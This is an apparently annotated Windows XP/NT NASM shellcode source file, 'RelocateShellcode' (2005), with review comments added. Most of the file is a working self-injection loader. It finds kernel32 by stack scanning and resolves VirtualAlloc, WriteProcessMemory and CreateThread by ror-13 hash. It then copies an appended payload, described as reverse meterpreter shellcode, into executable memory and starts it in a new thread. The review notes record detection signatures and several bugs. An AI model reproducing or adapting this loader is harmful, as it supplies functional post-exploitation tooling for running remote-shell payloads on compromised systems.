/* Badchecksum - www.badchecksum.com */
/*
   Name:        RelocateShellcode
   Description: Shellcode that uses VirtualAlloc to reserve a memory region in
                the same process it runs in, then copies the shellcode that
                follows it in memory into that region and runs it in a new
                thread.  It uses the "topstack" technique to locate kernel32
                and hashes generated with
                http://www.badchecksum.com/code/pentest/findhash.c to resolve
                the function addresses.  This shellcode is useful for running
                an exploit's payload in another thread and then leaving the
                exploited thread cleanly, or even restoring normal execution.
   Author:      Simkin
   Date:        9/01/2005
   OS:          Winxp/nt
   Assembler:   nasm/alink
   Build:       nasmw -f win32 shellcode.asm
                alink -oPE -entry startup shellcode.obj

   Analyst notes (review):
   - Observable behaviour is VirtualAlloc(PAGE_EXECUTE_READWRITE) ->
     WriteProcessMemory into the current process -> CreateThread on the new
     region: the classic self-injection sequence that endpoint monitoring
     keys on.
   - Register contract at entry: ebp must point at writable scratch memory;
     a 4-entry function-pointer table is written at [ebp+4] .. [ebp+0x13].
     Nothing in this file initialises ebp -- presumably inherited from the
     exploited frame; confirm before relying on it.
   - No return value of any API call is checked.
*/

[segment .text]
[global startup]

;-----------------------------------------------------------------------
; startup -- entry point.
; Stage 1: locate kernel32 and resolve four exports into a pointer table
;          at [ebp+4] (VirtualAlloc, GetCurrentProcess, WriteProcessMemory,
;          CreateThread, in hash-table order).
; Stage 2: allocate an RWX region, copy the payload that follows this code
;          into it, and start it on a new thread.
; Uses:    eax, ecx, edx, esi, edi, flags; ebp is read as the table base.
;-----------------------------------------------------------------------
startup:
        call    find_kernel32
        mov     edx, eax                ; edx = kernel32 image base (find_function arg)
        call    get_hashes_base
        mov     esi, eax                ; esi = first hash (lodsd source)
        lea     edi, [ebp+0x4]          ; edi = first output slot for resolved pointers
        mov     ecx, esi
        add     ecx, 0x10               ; 4 functions, 16 bytes -> ecx = end of hash table
        call    resolve_symbols_for_dll ; fills [ebp+4], [ebp+8], [ebp+0xc], [ebp+0x10]

        ; VirtualAlloc(NULL, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        ; stdcall: arguments pushed right to left
        push    0x40                    ; PAGE_EXECUTE_READWRITE
        push    0x3000                  ; MEM_COMMIT | MEM_RESERVE
        push    0x400                   ; 1024 bytes
        push    0x0                     ; NULL (OS chooses the address)
        call    [ebp+0x4]               ; VirtualAlloc
        mov     esi, eax                ; esi = new region ("proc"); NULL on failure is not checked

        ; GetCurrentProcess()
        call    [ebp+0x8]
        mov     edi, eax                ; edi = pseudo-handle for this process

        call    get_shellcode_base
        mov     ecx, eax                ; ecx = address of the payload appended after this file

        ; WriteProcessMemory(GetCurrentProcess(), proc, scode, strlen(scode), NULL);
        push    0x0                     ; lpNumberOfBytesWritten = NULL
        push    0x7D0                   ; nSize: reverse meterpreter shellcode length (2000 bytes),
                                        ; hard-coded -- must match the appended payload; note it
                                        ; exceeds the 1024 bytes requested from VirtualAlloc above,
                                        ; presumably relying on page-granular allocation -- confirm
        push    ecx                     ; lpBuffer = scode
        push    esi                     ; lpBaseAddress = proc
        push    edi                     ; hProcess = GetCurrentProcess()
        call    [ebp + 0xc]             ; WriteProcessMemory; result unchecked

        ; CreateThread(NULL, 0, proc, NULL, 0, NULL);
        push    0x0                     ; lpThreadId = NULL
        push    0x0                     ; dwCreationFlags = 0
        push    0x0                     ; lpParameter = NULL
        push    esi                     ; lpStartAddress = proc
        push    0x0                     ; dwStackSize = 0
        push    0x0                     ; lpThreadAttributes = NULL
        call    [ebp + 0x10]            ; CreateThread; returned handle is neither checked nor closed

        ; Exit here.. (author's placeholder: exit / restore-execution code goes here)
        ; NOTE(review): as written nothing follows, so control falls through into
        ; find_kernel32 below and eventually executes its 'ret' against an
        ; unrelated stack slot.
;-----------------------------------------------------------------------
; find_kernel32 -- return the kernel32.dll image base in eax.
; In:     nothing (reads the TEB through fs:[0x18])
; Out:    eax = image base: first 64K-aligned address at or below the probe
;         whose first word is 'MZ'
; Clobb:  eax, flags (esi is preserved via push/pop)
; Method: the "topstack" technique named in the header -- take a dword from
;         just below the thread's StackBase, assume it is an address inside
;         kernel32, then scan downwards for the DOS header.
;-----------------------------------------------------------------------
find_kernel32:
        push    esi
        xor     esi, esi
        mov     esi, [fs:esi + 0x18]    ; esi = TEB (fs:[0x18] is the TIB self pointer)
        lodsd                           ; skip TIB.ExceptionList
        lodsd                           ; eax = TIB.StackBase (top of the thread stack)
        mov     eax, [eax - 0x1c]       ; presumably a kernel32 address left near the top of
                                        ; the stack at thread start (WinXP/NT layout per the
                                        ; header) -- OS-version dependent, verify
find_kernel32_base:
find_kernel32_base_loop:
        dec     eax
        xor     ax, ax                  ; eax = (eax - 1) & 0xFFFF0000: step down one 64K block
                                        ; (16-bit write deliberately keeps the upper half)
        cmp     word [eax], 0x5a4d      ; 'MZ' DOS header signature?
        jne     find_kernel32_base_loop ; unbounded: loops until a match (or an access fault)
find_kernel32_base_finished:
        pop     esi
        ret

;-----------------------------------------------------------------------
; find_function -- resolve one export of a PE32 image by name hash.
; C-ish:  void *find_function(void *base, uint32_t hash)
;         caller pushes hash, then base, and cleans the stack itself
; In:     [esp+4] = image base, [esp+8] = ror-13 hash of the export name
; Out:    eax = virtual address of the export; if no name matches, eax is
;         left unchanged (there is no not-found signal)
; Clobb:  flags only -- all other registers are restored by popad
; Walks IMAGE_EXPORT_DIRECTORY: AddressOfNames -> AddressOfNameOrdinals ->
; AddressOfFunctions, using hard-coded PE32 structure offsets.
;-----------------------------------------------------------------------
find_function:
        pushad                          ; 32 bytes saved: args now at [esp+0x24] / [esp+0x28]
        mov     ebp, [esp + 0x24]       ; ebp = image base
        mov     eax, [ebp + 0x3c]       ; eax = e_lfanew (offset of IMAGE_NT_HEADERS)
        mov     edx, [ebp + eax + 0x78] ; edx = export directory RVA (DataDirectory[0])
        add     edx, ebp                ; edx = &IMAGE_EXPORT_DIRECTORY
        mov     ecx, [edx + 0x18]       ; ecx = NumberOfNames
        mov     ebx, [edx + 0x20]       ; ebx = AddressOfNames RVA
        add     ebx, ebp                ; ebx = &name-RVA table
find_function_loop:
        jecxz   find_function_finished  ; every name tried: return without a result
        dec     ecx                     ; walk the table backwards; ecx = current name index
        mov     esi, [ebx + ecx * 4]    ; esi = RVA of the name string
        add     esi, ebp                ; esi = name string (NUL-terminated)
compute_hash:
        xor     edi, edi                ; edi = running hash
        xor     eax, eax                ; so that lodsb yields a clean zero-extended byte in eax
        cld                             ; lodsb must walk forward
compute_hash_again:
        lodsb                           ; al = next character
        test    al, al
        jz      compute_hash_finished   ; NUL terminator reached
        ror     edi, 0xd                ; hash = ror(hash, 13) + c
        add     edi, eax
        jmp     compute_hash_again
compute_hash_finished:
        cmp     edi, [esp + 0x28]       ; is this the requested hash?
        jnz     find_function_loop
        mov     ebx, [edx + 0x24]       ; ebx = AddressOfNameOrdinals RVA
        add     ebx, ebp
        mov     cx, [ebx + 2 * ecx]     ; cx = ordinal for this name (16-bit write: relies on the
                                        ; upper half of ecx already being zero)
        mov     ebx, [edx + 0x1c]       ; ebx = AddressOfFunctions RVA
        add     ebx, ebp
        mov     eax, [ebx + 4 * ecx]    ; eax = function RVA
        add     eax, ebp                ; eax = function VA
        mov     [esp + 0x1c], eax       ; overwrite the saved-eax slot so popad returns it
find_function_finished:
        popad
        ret

;-----------------------------------------------------------------------
; resolve_symbols_for_dll -- resolve a run of hashes into a pointer table.
; In:    esi = first hash (4-byte entries), ecx = one past the last hash,
;        edx = image base, edi = output table
; Out:   one pointer per hash stored at [edi]; esi and edi advanced past
;        their tables
; Clobb: eax, esi, edi, flags
; Loops by re-entering its own label until esi == ecx, so at least one
; entry is always processed (esi == ecx on entry still resolves one).
;-----------------------------------------------------------------------
resolve_symbols_for_dll:
        lodsd                           ; eax = next hash, esi += 4
        push    eax                     ; arg 2: hash
        push    edx                     ; arg 1: image base
        call    find_function
        mov     [edi], eax              ; store the resolved address (eax unchanged if not found)
        add     esp, 0x08               ; caller-cleaned arguments
        add     edi, 0x04
        cmp     esi, ecx
        jne     resolve_symbols_for_dll ; more hashes to go
resolve_symbols_for_dll_finished:
        ret

;-----------------------------------------------------------------------
; get_hashes_base -- return the address of kernel32_symbol_hashes in eax
; (call/pop trick, so the code needs no absolute addresses).
; Out:   eax = &kernel32_symbol_hashes
; Clobb: eax
; 'call middle' pushes the address of 'end'; +7 is meant to skip the
; pop/add/ret bytes between 'end' and the table.  That constant is the
; byte count as the author's assembler encoded those instructions and is
; therefore encoding-dependent -- TODO confirm against real assembler output.
;-----------------------------------------------------------------------
get_hashes_base:
        jmp     forward
middle:
        jmp     end
forward:
        call    middle                  ; pushes the address of 'end'
end:
        pop     eax                     ; eax = &end
        add     eax, 0x7                ; eax = &kernel32_symbol_hashes
        ret

; ror-13 hashes of the kernel32 export names, one dword each (raw bytes,
; read as little-endian dwords by lodsd).  Their order defines the layout
; of the pointer table startup writes at [ebp+4].
kernel32_symbol_hashes:
        db      0x54,0xca,0xaf,0x91     ; VirtualAlloc
        db      0xe6,0x17,0x8f,0x7b     ; GetCurrentProcess
        db      0xa1,0x6a,0x3d,0xd8     ; WriteProcessMemory
        db      0x6b,0xd0,0x2b,0xca     ; CreateThread

;-----------------------------------------------------------------------
; get_shellcode_base -- return the address of the byte following this
; routine's 'ret', i.e. the start of the appended payload.
; Out:   eax = &payload
; Clobb: eax
; Same call/pop trick and same encoding-dependent +7 as get_hashes_base.
;-----------------------------------------------------------------------
get_shellcode_base:
        jmp     forward2
middle2:
        jmp     end2
forward2:
        call    middle2                 ; pushes the address of 'end2'
end2:
        pop     eax                     ; eax = &end2
        add     eax, 0x7                ; eax = first byte after the 'ret' below
        ret

; The shellcode (payload) goes here: appended directly after the 'ret'
; above.  Nothing in this file bounds or validates it; its length must
; match the 0x7D0 hard-coded in startup's WriteProcessMemory call.